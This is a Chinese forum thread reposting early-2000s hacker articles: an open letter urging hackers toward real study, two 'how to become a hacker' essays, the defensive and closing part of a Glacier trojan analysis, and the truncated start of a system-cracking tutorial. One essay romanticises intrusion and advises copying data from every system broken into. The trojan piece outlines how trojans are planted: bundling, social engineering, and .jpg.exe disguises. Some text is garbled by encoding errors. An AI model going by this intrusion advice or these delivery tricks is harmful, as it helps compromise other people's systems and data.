论坛: 菜鸟乐园 标题: 大量黑客文章! 复制本贴地址    
作者: mingming8 [mingming8]    论坛用户   登录
本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来

本帖由 [马大哈] 从 << 茶余饭后>> 转移而来

以下是我自己整理的一些黑客文章,虽说对大家的学习不一定有什么帮助,但至少可以提高对黑客的兴趣吧!
  有一些是很老的了!

地主 发表时间: 11/10 19:57

回复: mingming8 [mingming8]   论坛用户   登录
一个中国黑客致中国黑客和红客的公开信
--------------------------------------------------------------------------------
类别:黑客天空  添加日期:2002.10.24  今日/总浏览:171/6627 
编者注:这篇文章在很多论坛你都可以看到,由于时间长,我们已经无法提供作者和来源,是很抱歉的。
------------------------------------------------
所有中国黑客和红客,我的同胞们:

首先声明,我的计算机软件技术、黑客功底,可能不会比你们任何人差:

我通读过 MINIX,TCP/IP,BSD,LINUX, PL1的源码,我拿过中国高级程序员证书,SUN 的JAVA证书,精通VC和UNIX,对缓冲区溢出,病毒,DDK等均有研究,所以我想我有资格对你们说几句话。

(如果我提到的一些计算机名词和人名,你们居然不知道,那只能证明你们的无知,和不配称为黑客。)

如果是真正的黑客,他会知道

1.发明TCP/IP的是美国人 。

2. LINUX的作者,linus大侠现在也在美国工作 。

3. OPEN SOURCE的开创人 STALLMAN 也是美国人,他提倡软件不分国界的自由的精神 。

4. FREE BSD 的作者是美国人,他的SOURCE 让真正的黑客受惠

5.世界级软件科学大师 tanabaom,也是美国的客座教授,他的minix, ameba和教材教育了全世界几代黑客。

提到这些,不是崇美,不是恐美,只想证明:

1.很多大师级的美国黑客,他们的理念恰恰是自由、开放、无国界;他们的自由软件,开放源码,是与政治无关的,是超越国界的,给全世界人们带来福音。

2.真正的黑客精神,如stallman所说,是要让人类超越计算机,成为计算机的主宰,从而成为自由的。

所有的中国黑客和红客,我的同胞们:

当你们正通过下载美国人写的黑客工具,来攻击美国网络,并且乐此不疲,以为这就是爱国行动的时候,是否想过:

此时此刻,印度的软件人士,正在努力提高软件技术,他们的软件水平、软件产业已经超越了中国;难道我们不应该痛苦地承认这个现实,并且奋起直追吗?

中国发明了火药,但是缺少研究精神,结果是被西方人研究改进了以后打中国,这样的教训还少吗?

中国向来不缺爱国热情,但是我们缺少对科技的认真研究精神,知耻而后勇的追赶精神。难道我们不愿意承认这一点吗?

从战术上来说,过早暴露自己的实力是不聪明的;冒昧地问一句,如果真的战争爆发了,您的黑客技术完全掌握好了吗,您已经为那一天的到来在进行技术储备吗?

您有没有想向那些真正为中国科技做出杰出贡献的科学家如钱学森学习呢?

所有的中国黑客和红客,我的同胞们:

请把你们的聪明才智用到真正提高你们的水平,对国家的强大有帮助的地方吧:

如果您愿意对国家有所贡献:

1.中国的863计划中有一个重点研究项目: 并行计算,分布计算,向量计算。您愿意研究它吗?

2. 作为现代通讯技术的一个根本数学基础,大合数的快速因子分解,还是一个难题。您愿意研究它吗?

如果您想提高技术,对中国的软件技术有所贡献:

1.研究 VC,JAVA

2.研究数据结构,去考高级程序员

3. 研究操作系统,读minix source code

4. 研究tcp/ip, rfc文档

5. 通读linux, 才算达到黑客境界

6. 学习 UML,ROSE,软件工程,达到系统分析员水平。

如果您对提高中国的科技有兴趣,去研究生物基因,材料技术(纳米技术),计算机技术,航天技术……

我的同胞们,我愿大声呐喊:

一个真正的民族主义者,不是义和团,不是太平天国,不是闭关锁国,不是盲目仇外,不是不敢正视自己民族和文化的丑陋和缺点。

真正的民族主义者是成熟的、清醒的、理智的、务实的民族主义。真正的民族主义者不是种族主义者,不是极端份子,不是战争狂人。

真正的民族主义者以追求本民族――中华民族的利益最大化为目标、准则、信念。判断一个人是不是真正的民族主义者,判断标准很简单:看他是给本民族的整体利益带来好处,还是损害民族利益。真正的民族主义者最务实,因为他知道坚持原则,同时又懂得策略。让我们成为真正的顶尖黑客!让我们成为真正的民族主义者!


作者: 佚名
来源: 天天安全网 整理 

【收藏本文】【关闭窗口】

 天天安全网免责声明:
任何转载或转贴,我们将在里边注明作者和来源。如果欺犯了作者利益,我们在得到反馈的情况下,将在当天维护中改正过来。互联网的梦想:自由 平等 共享 互助



B1层 发表时间: 11/10 19:59

回复: mingming8 [mingming8]   论坛用户   登录
Net - Man 5


  Love-gone 著

[前言]

  不知道怎麽一回事!!最近喜欢玩电脑的人是越来越多了..
  今天我在聊天室遇到一个17岁的男孩子.我问他说你喜不喜欢玩电脑呢??他回答说对阿.
我问他说你喜欢玩网路的什麽的时候~~唉..他竟然说:『入侵』!!老实说,我觉得满感慨的
哩.好像现在玩电脑的青少年都对入侵很有兴趣..也不知道是为什麽.或许只是为了要拥有
"hacker"这个名号吧!!

  据我的观察和经验ㄚ.玩入侵的人大多数都跟是想证明自己跟其他人是不一样的.而玩入
侵的人可能只是单纯为了好玩的乐趣.但是有时也是因为在现实生活的挫折,所以才把怨恨
都往网路这个虚拟世界来发 !!事实上Love-gone也跟玩入侵的人差不多啦..呵呵  :-)

  要当一个骇客是不容易的事哩!而最重要的是要有恒心和毅力...当然经验也是很重要的
啦.

  对於想当一个骇客的人而言.给他鱼吃不如给他一根钓竿!!所以ㄚ,知道如何成为一个
骇客的技巧是非常重要的哩..


[主题]

如何成为一个骇客

[困难度]

非常简单

[说明]

  以下的一些方法是我自己和我所认识的骇客们的感想和经验!对於一个想成为骇客的人,
或是已经是骇客了,但是想要成为更顶尖的骇客们来说是非常宝贵的经验和学习方向!

[开始]

  成为一个骇客老实说��不是一件很困难的事哩!
  但是也不是一件轻�绲氖铝�!因为这是一条漫长的路,所须要的是你的恒心和毅力.当然啦
!!你的恒心和毅力要从那�翰趴梢缘玫侥�??  当然是从你对电脑的热爱和对入侵的执著啦!
所以如果你对电脑和入侵��没有什麽太大的欲望的话..那麽你还是别在这�豪朔涯愕氖奔�
��!


******时间的取得*******

  我说过了.当一个骇客最重要的是要有足够的时间让你去做充分的练习.然而,在现在这种
鸡不生蛋鸟不拉屎的年代��,有永远做不完的事哩!!要如何才可以去取得充分的时间呢??
我们的老��(就是上天啦!!GOD)给大家的时间都是一样的,一天24小时.
  嘿嘿 !! 在此我就说说我玩电脑的时间来给大家当做是参考吧...当然啦!!最重要的是
你要知道运用时间的技巧ㄚ..每个人的坐习都是不一样的,而且职业也是不一样ㄚ..所以
练习的时间就要自己去调整啦!!!
  因为love-gone是一个可怜的学生.每天都要去上学..所以我就从我上学时间开始说我玩
电脑的时间吧!!

                    6:00----起床(好想赖床喔)
                    6:35----等校车来接我(有一个漂亮的学妹跟我一起等说..呵呵)
                    7:30----到学校读书了(看到我美丽的老婆 :-D  )
                    5:50----到家(回家快吃吃饭)
                    6:15----打开电脑,开始我的模拟终端机的入侵!!!
                  02:00----哇!!好晚了..好玩的时光总是过的快..赶快把握时间继续的
                            努力..在网路堆叠�杭绦�奋��!!我是夜晚的��士(有神经质)
                  04:15----哇!不行了..明天还要上学...依依不�宓娜ニ�觉了..结束了
                            今天的网路生活.
                    6:00----起床(还是想赖床..但是想到学校漂漂的老婆.赶快起床)

  我的生活就是如此简单啦!!每天打9个小时的电脑..老实说,有一阵子都是3天才睡一次
的哩!!因为入侵到天明,还来不及去睡觉太阳公公就来了.但是这是我个人的生活啦!而且
这样子的生活是不正常的,所以你们还是别那麽疯狂,对身体有害!!
  我认识的许多骇客高手们的生活习惯都跟我差不多,因为我们对於入侵有很大的热忱!!
但是这样是不好的,因为这样对你现实生活是百害而无一益的哩!!


******资讯的取得*******

  资讯的取得对於一个骇客是很重要的!
  随时取得最新的资讯,才可以让你拥有最新的技术!!骇客们要常常注意的是新的系统漏洞,
新的系统资讯,新的网路走向...等等的资讯.而如何才能得到这些资讯呢??

1.收集超多的搜寻引擎,让你可以找到各种站��
  (建议你做一个html,�好娣判矶嗨阉饕�擎的超连节)
2.新闻群组,让你掌握最新议题
  (这是最简单也是最方便的方法)
3.订有关系统资讯的e-mail
  (大多数的都是免费,而且这是我各人认为最好的管道!!因为它随时提供你最新系统资讯)
4.认识相同兴趣的人,一起练习,互相讨论心得.
  (这是好方法!!!!可以去熟悉每一个骇客的入侵手法)
5.多看书
  (尤其是网路和系统安全的书,这个方法是很重要的步骤.要先打好基础这样才能当一个
  快乐的骇客嘛!!)
6.平时就要知道那几个骇客站�榛蚴窍低痴井槭呛玫�..这样要找资料也方便!!
  (事实上,系统安全工作室就是一个好站�榱寺�!!呵呵...真是老王卖瓜自卖自��)
7.你每入侵一个地方就要把那个地方对你有用的东西和资料都copy起来.


******如何找到骇客*******

  如果你想要找骇客出来一起讨论研究心得的话.
  你可以用ICQ或是到聊天室去找利害的人.最好的方法就是做一个自己的网页,这样就会
有骇客会连络你了!
  据我的经验呢.在聊天室�夯崴底约汉芾�害的都不是真的很利害的骇客.那些人只是玩玩
小把戏或是玩当机的�障返男∶�头罢了!!所以在聊天室,你要找的是对电脑系统或网路有心
得和知识的人.而不是称自己是骇客的人.


******骇客的一些特徵*******

  就像我以前说的,会想当一个骇客的人有两种.一种是对电脑有强烈热忱的人,一种是为了
逃避现实世界而把自己淹没在虚拟世界的人.老实说,Love-gone是介於两者之间.
  骇客们大多数只要听到有人谈论有关电脑的事就会靠过去跟人家讨论.而且,大多数的顶
尖骇客对自己都非常的有信心,但是人际关�鸩惶�好!!因为整天都做在模拟终端机前.
 

[感言]

  Love-gone觉得机器(电脑)只是一个工具.你要懂得如何去控制电脑,而不是让电脑来驾驭
你,知道吗?
  老实说,Love-gone老是觉得自己已经得到了网瘾症..唉..真可怜. 虽然未来的走向是,
能拥有电脑系统和网路技术的人就能领导群雄创造未来.但是也不要把自己迷失在科技的
沙漠�翰藕�.留一点时间给你的家人,也留一点时间去开创你现实的生活不是很好吗?
  Love-gone当骇客也有一段时间��!!对於这门子的事总是有很多感慨哩!Love-gone当初也
想不到自己会当一个骇客的.
 
*NOTE: Love-gone最近喜欢去好乐迪唱歌,住高雄的人.如果要请我的话就联络我,知道吗?




Love-gone的E-mail信箱: lovegone@ms7.accmail.com.tw
Love-gone的ICQ#: 12294548




这份文章的著作权是属於Love-gone所有.禁止任何人未经许可擅自破坏其文章


B2层 发表时间: 11/10 20:01

回复: mingming8 [mingming8]   论坛用户   登录
如何成为一名黑客?
www。jk52.com 2002-9-11  剑客之家


如何成为一名黑客?
Jargon File中对“黑客”一词给出了很多个定义,大部分定义都涉及高超的编程技术,强烈的解决问题和克服限制的欲望。如果你想知道如何成为一名黑客,那么好,只有两方面是重要的。(态度和技术)

长久以来,存在一个专家级程序员和网络高手的共享文化社群,其历史可以追溯到几十年前第一台分时共享的小型机和最早的ARPAnet实验时期。 这个文化的参与者们创造了“黑客”这个词。 黑客们建起了Internet。黑客们使Unix操作系统成为今天这个样子。黑客们搭起了Usenet。黑客们让WWW正常运转。如果你是这个文化的一部分,如果你已经为它作了些贡献,而且圈内的其他人也知道你是谁并称你为一个黑客,那么你就是一名黑客。

黑客精神并不仅仅局限于软件黑客文化圈中。有些人同样以黑客态度对待其它事情如电子和音乐---事实上,你可以在任何较高级别的科学和艺术中发现它。软件黑客们识别出这些在其他领域同类并把他们也称作黑客---有人宣称黑客实际上是独立于他们工作领域的。 但在本文中,我们将注意力集中在软件黑客的技术和态度,以及发明了“黑客”一词的哪个共享文化传统之上。

另外还有一群人,他们大声嚷嚷着自己是黑客,实际上他们却不是。他们是一些蓄意破坏计算机和电话系统的人(多数是青春期的少年)。真正的黑客把这些人叫做“骇客”(cracker),并不屑与之为伍。多数真正的黑客认为骇客们是些不负责任的懒家伙,还没什么大本事。专门以破坏别人安全为目的的行为并不能使你成为一名黑客, 正如拿根铁丝能打开汽车并不能使你成为一个汽车工程师。不幸的是,很多记者和作家往往错把“骇客”当成黑客;这种做法激怒真正的黑客。

根本的区别是:黑客们建设,而骇客们破坏。

如果你想成为一名黑客,继续读下去。如果你想做一个骇客,去读 alt.2600 新闻组,并在发现你并不像自己想象的那么聪明的时候去坐5到10次监狱。 关于骇客,我只想说这么多。

---黑客的态度

黑客们解决问题,建设事物,信仰自由和双向的帮助,人人为我, 我为人人。
要想被认为是一名黑客,你的行为必须显示出你已经具备了这种态度。要想做的好象你具备这种态度,你就不得不真的具备这种态度。但是如果你想靠培养黑客态度在黑客文化中得到承认,那就大错特错了。因为成为具备这些特质的这种人对你自己非常重要,有助于你学习,并给你提供源源不断的活力。同所有有创造性的艺术一样,成为大师的最有效方法就是模仿大师的精神---不是仅从理智上,更要从感情上进行模仿。

So,如果你想做一名黑客,请重复以下事情直到你相信它们:

1 这世界充满待解决的迷人问题

做一名黑客有很多乐趣,但却是些要费很多气力方能得到的乐趣。 这些努力需要动力。成功的运动员从健壮体魄,挑战自我极限中汲取动力。同样,做黑客,你必须
要有从解决问题,磨练技术,锻炼智力中得到基本的热望。如果你还不是这类人又想做黑客,你就要设法成为这样的人。否则你会发现,你的黑客热情会被其他诱惑无情地吞噬掉---如金钱、性和社会上的虚名。

(同样你必须对你自己的学习能力建立信心---相信尽管你对某问题所知不多,但如果你一点一点地学习、试探,你最终会掌握并解决它。)

2. 一个问题不应该被解决两次

聪明的脑瓜是宝贵的,有限的资源。当这个世界还充满其他有待解决的有趣问题之时,他们不应该被浪费在重新发明轮子这些事情上。 作为一名黑客,你必须相信其他黑客的思考时间是宝贵的---因此共享信息,解决问题并发布结果给其他黑客几乎是一种道义,这样其他人就可以去解决新问题而不是重复地对付旧问题。

(你不必认为你一定要把你的发明创造公布出去,但这样做的黑客是赢得大家尊敬最多的人。卖些钱来给自己养家糊口,买房买车买计算机甚至发大财和黑客价值也是相容的,只要你别忘记你还是个黑客。)

3. 无聊和乏味的工作是罪恶

黑客们应该从来不会被愚蠢的重复性劳动所困扰,因为当这种事情发生时就意味着他们没有在做只有他们才能做的事情---解决新问题。这样的浪费伤害每一个人。因此,无聊和乏味的工作不仅仅是令人不舒服而已,它们是极大的犯罪。 要想做的象个黑客,你必须完全相信这点并尽可能多地将乏味的工作自动化,不仅为你自己,也为了其他人(尤其是其他黑客们)。

(对此有一个明显的例外。黑客们有时也做一些重复性的枯燥工作以进行“脑力休息”,或是为练熟了某个技巧,或是获得一些除此无法获得的经验。但这是他自己的选择---有脑子的人不应该被迫做无聊的活儿。)


4 自由就是好

黑客们是天生的反权威主义者。任何能向你发命令的人会迫使你停止解决令你着迷的问题,同时,按照权威的一般思路,他通常会给出一些极其愚昧的理由。因此,不论何时何地,任何权威,只要他压迫你或其他黑客,就要和他斗到底。

(这并非说任何权力都不必要。儿童需要监护,罪犯也要被看管起来。 如果服从命令得到某种东西比起用其他方式得到它更节约时间,黑客会同意接受某种形式的权威。但这是一个有限的、特意的交易;权力想要的那种个人服从不是你的给予,而是无条件的服从。)

权力喜爱审查和保密。他们不信任自愿的合作和信息共享---他们只喜欢由他们控制的合作。因此,要想做的象个黑客,你得对审查、保密,以及使用武力或欺骗去压迫人们的做法有一种本能的反感和敌意。

5. 态度不能替代能力

要做一名黑客,你必须培养起这些态度。但只具备这些态度并不能使你成为一名黑客,就象这并不能使你成为一个运动健将和摇滚明星一样。成为一名黑客需要花费智力,实践,奉献和辛苦。

因此,你必须学会不相信态度,并尊重各种各样的能力。黑客们不会为那些故意装模做样的人浪费时间,但他们却非常尊重能力---尤其是做黑客的能力,不过任何能力总归是好的。具备很少人才能掌握的技术方面的能力尤其为好,而具备那些涉及脑力、技巧和聚精会神的能力为最好。

如果你尊敬能力,你会享受提高自己能力的乐趣---辛苦的工作和奉献会变成一种高度娱乐而非贱役。 要想成为一名黑客,这一点非常重要。


---基本黑客技术

黑客态度是重要的,但技术更加重要。态度无法替代技术,在你被别的黑客称为黑客之前,有一套基本的技术你必须掌握。 这套基本技术随着新技术的出现和老技术的过时也随时间在缓慢改变。例如,过去包括使用机器码编程,而知道最近才包括了HTML语言。但现在明显包括以下技术:

1 学习如何编程

这当然是最基本的黑客技术。如果你还不会任何计算机语言,我建议你从Python开始。它设计清晰,文档齐全,对初学者很合适。尽管是一门很好的初级语言,它不仅仅只是个玩具。它非常强大,灵活,也适合做大型项目。

但是记住,如果你只会一门语言,你将不会达到黑客所要求的技术水平,甚至也不能达到一个普通程序员的水平---你需要学会如何以一个通用的方法思考编程问题,独立于任何语言。要做一名真正的黑客,你需要学会如何在几天内通过一些手册,结合你现在所知,迅速掌握一门新语言。这意味着你应该学会几种不同的语言。

如果要做一些重要的编程,你将不得不学习C语言,Unix的核心语言。其他对黑客而言比较重要的语言包括Perl和LISP。 Perl很实用,值得一学;它被广泛用于活动网页和系统管理,因此即便你从不用Perl写程序,至少也应该能读懂它。 LISP 值得学习是因为当你最终掌握了它你会得到丰富的经验;这些经验使你在以后的日子里成为一个更好的程序员,即使你实际上可能很少使用LISP本身。

当然,实际上你最好四种都会。 (Python, C, Perl, and LISP). 除了是最重要的四种基本语言,它们还****了四种非常不同的编程方法,每种都会让你受益非浅。

这里我无法完整地教会你如何编程---这是个复杂的活儿。但我可以告诉你,书本和课程也不能作到。几乎所有最好的黑客都是自学成材的。真正能起作用的就是去亲自读代码和写代码。

学习如何编程就象学习用自然语言写作一样。最好的做法是读一些大师的名著,试着自己写点东西,再读些,再写点,又读些,又写点....如此往复,直到你达到自己在范文中看到的简洁和力量。

过去找到好的代码去读是困难的,因为很少有大型程序的可用源代码能让新手练手。这种状况已经得到了很大的改善;现在有很多可用的开放源码软件,编程工具和操作系统(全都有黑客写成)。这使我们自然地来到第二个话题...

2 得到一个开放源码的Unix并学会使用、运行它

我假设你已经拥有了一台个人计算机或者有一个可用的( 今天的孩子们真幸福 :-) )。新手们最基本的一步就是得到一份Linux或BSD-Unix,安装在个人计算机上,并运行它。
当然,这世界上除了Unix还有其他操作系统。但它们都是以二进制形式发送的---你无法读到它的源码,更不可能修改它。尝试在DOS或Windows的机器上学习黑客技术,就象是在腿上绑了铁块去学跳舞。

除此之外,Unix还是Internet的操作系统。你可以不知道Unix而学会用Internet,但不懂它你就无法成为一名Internet黑客。因为这个原因,今天的黑客文化在很大程度上是以Unix为中心的。(这点并不总是真的,一些很早的黑客对此很不高兴,但Unix和Internet之间的共生关系已是如此之强,甚至连微软也无可奈何)

So,装一个Unix---我个人喜欢Linux,不过也有其他选择。(你也可以在同一台机器上同时运行DOS,Windows和Linux)学会它。运行它。用它跟Internet对话。读它的代码。试着去修改他。你会得到比微软操作系统上好的多的编程工具(包括C,Lisp, Python, and Perl),你会得到乐趣,并将学到比你想象的更多知识。

关于学习Unix的更多信息,请看 The Loginataka.

要得到Linux,请看: 哪里能得到 Linux.

3 学会如何使用WWW和写HTML

大多黑客文化建造的东西都在你看不见的地方发挥着作用,帮助工厂、办公室和大学正常运转,表面上很难看到它对他人的生活的影响。Web是一个大大的例外。即便政客也同意,这个巨大而耀眼的黑客玩具正在改变整个世界。单是这个原因(还有许多其它的), 你就需要学习如何掌握Web。

这并不是仅仅意味着如何使用浏览器(谁都会),而是要学会如何写HTML,Web的标记语言。如果你不会编程,写HTML会教你一些有助于学习的思考习惯。因此,先建起自己的主页。

但仅仅建一个主页也不能使你成为一名黑客。 Web里充满了各种网页。多数是无意义的,零信息量垃圾。

要想有价值,你的网页必须有内容---必须有趣或对其它黑客有用。这样,我们来到下一个话题....


---黑客文化中的地位


象大部分不涉及金钱的文化一样,黑客王国的运转靠声誉维护。你设法解决有趣的问题,但它们到底多有趣,你的解法有多好,是要有那些和你具有同样技术水平的人或比你更牛的人去评判的。

相应地,当你在玩黑客游戏时,你知道,你的分数要靠其他黑客对你的技术的评估给出。(这就是为什么只有在其它黑客称你为黑客是,你才算得上是一名黑客)这个事实常会被黑客是一项孤独的工作这一印象所减弱;它也会被另一个黑客文化的禁忌所减弱(此禁忌的效力正在减弱但仍很强大):拒绝承认自我或外部评估是一个人的动力。

特别地,黑客王国被人类学家们称为一种精英文化。在这里你不是凭借你对别人的统治来建立地位和名望,也不是靠美貌,或拥有其他人想要的东西,而是靠你的奉献。尤其是奉献你的时间,你的才智和你的技术成果。

要获得其他黑客的尊敬,你可以做以下五种事情:


1. 写开放源码的软件

第一个(也是最基本和传统的)是写些被其他黑客认为有趣或有用的程序,并把程序的原代码公布给大家共享。
(过去我们称之为“自由软件-free software”,但这却使很多不知free的精确含义的人感到不解。现在我们很多人使用“开放源码-open source”这个词)

黑客王国里最受尊敬的大牛们是那些写了大型的、具有广泛用途的软件,并把它们公布出去,使每人都在使用他的软件的人。

2. 帮助测试并修改开放源码的软件

黑客们也尊敬也那些使用、测试开放源码软件的人。在这个并非完美的世界上,我们不可避免地要花大量软件开发的时间在测试和抓臭虫阶段。 这就是为什么任何开放源码的作者稍加思考后都会告诉你好的beta测试员象红宝石一样珍贵。 (他知道如何清楚描述出错症状,很好地定位错误,能忍受快速发布的软件中的bug,愿意使用一些简单的诊断工具) 甚至他们中的一个能判断出哪个测试阶段是延长的、令人精疲力尽的噩梦,哪个只是一个有益健康的玩意儿。 IntRudeRs-QQ:929230



原作者:不详
来 源:不详
共有1434位读者阅读过此文

【告诉好友】


上篇文章:黑眼睛+键盘幽灵

下篇文章:黑客入侵教程

□- 本周热门文章  □- 相关文章 
如何成为一名黑客?


B3层 发表时间: 11/10 20:02

回复: mingming8 [mingming8]   论坛用户   登录
冰河浅析 - 揭开木马的神秘面纱(下)
                          作者:・ shotgun・yesky

                四、破解篇(魔高一尺、道高一丈)

  本文主要是探讨木马的基本原理, 木马的破解并非是本文的重点(也不是我的长处),具体的破解请大家期待yagami的《特洛伊木马看过来》(我都期待一年了,大家和我一起继续期待吧,嘿嘿),本文只是对通用的木马防御、卸载方法做一个小小的总结:
  1.端口扫描
  端口扫描是检查远程机器有无木马的最好办法, 端口扫描的原理非常简单, 扫描程序尝试连接某个端口, 如果成功, 则说明端口开放, 如果失败或超过某个特定的时间(超时), 则说明端口关闭。(关于端口扫描,Oliver有一篇关于“半连接扫描”的文章,很精彩,那种扫描的原理不太一样,不过不在本文讨论的范围之中)

  但是值得说明的是, 对于驱动程序/动态链接木马, 扫描端口是不起作用的。

  2.查看连接
  查看连接和端口扫描的原理基本相同,不过是在本地机上通过netstat -a(或某个第三方的程序)查看所有的TCP/UDP连接,查看连接要比端口扫描快,缺点同样是无法查出驱动程序/动态链接木马,而且仅仅能在本地使用。

  3.检查注册表
  上面在讨论木马的启动方式时已经提到,木马可以通过注册表启动(好像现在大部分的木马都是通过注册表启动的,至少也把注册表作为一个自我保护的方式),那么,我们同样可以通过检查注册表来发现"马蹄印",冰河在注册表里留下的痕迹请参照《潜行篇》。

  4.查找文件
  查找木马特定的文件也是一个常用的方法(这个我知道,冰河的特征文件是G_Server.exe吧? 笨蛋!哪会这么简单,冰河是狡猾狡猾的......)冰河的一个特征文件是kernl32.exe(靠,伪装成Windows的内核呀),另一个更隐蔽,是sysexlpr.exe(什么什么,不是超级解霸吗?)对!冰河之所以给这两个文件取这样的名字就是为了更好的伪装自己, 只要删除了这两个文件,冰河就已经不起作用了。其他的木马也是一样(废话,Server端程序都没了,还能干嘛?)
  黄鑫:"咳咳,不是那么简单哦......"(狡猾地笑)
  是的, 如果你只是删除了sysexlpr.exe而没有做扫尾工作的话,可能会遇到一些麻烦-就是你的文本文件打不开了,因为前面说了,sysexplr.exe是和文本文件关联的,你还必须把文本文件跟notepad关联上,方法有三种:
  a.更改注册表(我就不说了,有能力自己改的想来也不要我说,否则还是不要乱动的好)
  b.在<我的电脑>-查看-文件夹选项-文件类型中编辑
  c.按住SHIFT键的同时鼠标右击任何一个TXT文件,选择打开方式,选中<始终用该程序打开......>,然后找到notepad,点一下就OK了。(这个最简单,推荐使用)
  黄鑫:"我...我笑不起来了 :( "
  提醒一下,对于木马这种狡猾的东西,一定要小心又小心,冰河是和txt文件关联的,txt打不开没什么大不了,如果木马是和exe文件关联而你贸然地删了它......你苦了!连regedit都不能运行了!

  5.杀病毒软件
  之所以把杀病毒软件放在最后是因为它实在没有太大的用,包括一些号称专杀木马的软件也同样是如此, 不过对于过时的木马以及菜鸟安装的木马(没有配置服务端)还是有点用处的, 值得一提的是最近新出来的ip armor在这一方面可以称得上是比较领先的,它采用了监视动态链接库的技术,可以监视所有调用Winsock的程序,并可以动态杀除进程,是一个个人防御的好工具(虽然我对传说中“该软件可以查杀未来十年木马”的说法表示怀疑,嘿嘿,两年后的事都说不清,谁知道十年后木马会“进化”到什么程度?甚至十年后的操作系统是什么样的我都想象不出来)

  另外,对于驱动程序/动态链接库木马,有一种方法可以试试,使用Windows的"系统文件检查器",通过"开始菜单"-"程序"-"附件"-"系统工具"-"系统信息"-"工具"可以运行"系统文件检查器"(这么详细,不会找不到吧? 什么,你找不到! 吐血! 找一张98安装盘补装一下吧), 用“系统文件检查器”可检测操作系统文件的完整性,如果这些文件损坏,检查器可以将其还原,检查器还可以从安装盘中解压缩已压缩的文件(如驱动程序)。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马(或者损坏了),提取改动过的文件可以保证你的系统安全和稳定。(注意,这个操作需要熟悉系统的操作者完成,由于安装某些程序可能会自动升级驱动程序或动态链接库,在这种情况下恢复"损坏的"文件可能会导致系统崩溃或程序不可用!)


              五、狡诈篇(只要你的一点点疏忽......)

  只要你有一点点的疏忽,就有可能被人安装了木马,知道一些给人种植木马的常见伎俩对于保证自己的安全不无裨益。
1.网上“帮”人种植木马的伎俩主要有以下的几条
   a.软哄硬骗法;
   这个方法很多啦, 而且跟技术无关的, 有的是装成大虾, 有的是装成PLMM, 有的态度谦恭, 有的......反正目的都一样,就是让你去运行一个木马的服务端。
   b.组装合成法
   就是所谓的221(Two To One二合一)把一个合法的程序和一个木马绑定,合法程序的功能不受影响,但当你运行合法程序时,木马就自动加载了,同时,由于绑定后程序的代码发生了变化,根据特征码扫描的杀毒软件很难查找出来。
   c.改名换姓法
   这个方法出现的比较晚,不过现在很流行,对于不熟练的windows操作者,很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标, 再把文件名改为*.jpg.exe, 由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg, 不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)
   d.愿者上钩法
   木马的主人在网页上放置恶意代码,引诱用户点击,用户点击的结果不言而喻:开门揖盗;奉劝:不要随便点击网页上的链接,除非你了解它,信任它,为它死了也愿意...(什么乱七八糟呀)  

2. 几点注意(一些陈词滥调)
  a.不要随便从网站上下载软件,要下也要到比较有名、比较有信誉的站点,这些站点一般都有专人杀马杀毒;
  b.不要过于相信别人,不能随便运行别人给的软件;
(特别是认识的,不要以为认识了就安全了,就是认识的人才会给你装木马,哈哈,挑拨离间......)
  c.经常检查自己的系统文件、注册表、端口什么的,经常去安全站点查看最新的木马公告;
  d.改掉windows关于隐藏文件后缀名的默认设置(我是只有看见文件的后缀名才会放心地点它的)
  e.如果上网时发现莫名奇妙地硬盘乱响或猫上的数据灯乱闪,要小心;
 (我常常会突然关掉所有连接,然后盯著我的猫,你也可以试试,要是这时数据传送灯还在拼命闪,恭喜,你中木马了,快逃吧!)

                        六、后    记

  这篇文章的问世首先要感谢冰河的作者-黄鑫,我对他说:“我要写篇关于冰河的文章”,他说:“写呗”,然后就有了这篇文章的初稿(黄鑫:“不是吧,你答应要用稿费请我吃饭的,不要赖哦”),随后,黄鑫给我提了很多建议并提供了不少资料,谢谢冰河。
  其次是西祠的yagami,他是公认的木马专家,在我写作期间,他不仅在木马的检测、杀除方面提出了不少自己的看法,还给我找来了几个木马的源代码作为参考,不过这个家伙实在太忙,所以想看《特洛伊木马看过来》的朋友就只有耐心地等待了。
  第三个值得一提的家伙是武汉人,我的初稿一出来,他就忙不迭地贴出去了,当时我很狼狈,只能加紧写,争取早日完成,赶快把漏洞百出的初稿换下来,要不然,嘿嘿,估计大家也要等个一年半载的才能看到这篇文章了。
  这篇文章的初稿出来以后,有很多朋友问:为什么不用C++,而要用VB来写木马的源码说明呢?呵呵,其一是我很懒,VB比 VC要容易多了,还不会把windows搞死机(我用VC写程序曾经把系统搞崩溃过的:P);其二,本文中能用API的,我基本上都用了,VB只是很小的一块, WINAPI嘛,移植起来是很容易的;其三,正如我前面强调的,本文只是对木马的结构和原理进行一番讨论,并非教人如何编写木马程序,要知道,公安部已经正式下文:在他人计算机内下毒的要处以刑事处分。相比而言,VB代码的危害性要小很多的(如果完全用VB做一个冰河,大概要一兆多,还不连那些控件和动态链接库文件,呵呵,这么庞大的程序,能 悄 悄 地在别人的机子里捣鬼吗?)
  最后,作为冰河的朋友,我希望大家能抱著学术的态度来看这篇文章,同样能抱著学术的态度来看待冰河木马,不要用冰河做坏事,我替黄鑫先谢谢你了!(监视自己的女朋友不算,不过冰河不会对因为使用冰河导致和女友吵架直至分手负任何责任

                                    全文完             



B4层 发表时间: 11/10 20:03

回复: mingming8 [mingming8]   论坛用户   登录
如何破解系统

  这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, ��不是教人 Crack Password 若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责 !!

话说上次 CoolFire 讲到许多的 Net Coffee 店, 安全性之差实在是没话说, 但是过了这麽久也不
见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像 CoolFire
这样温和, 如果遇到的是比较狠一点的角色, 那你的 Net Coffee 可能要有一两天只卖 Coffee 而
没办法再 Net 下去了!!

继 CoolHC#1 推出��, 有许多人是否已经跃跃愈试了呢 ?? 这次咱们不谈新的花招, 用用之前所讲
的再来探险一番, 当然, 这一次我照往例还是不会使用真正的 Domain Name 来作教学, 但是课程
中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....

**谈一下 Crack Jack 猜猜密码

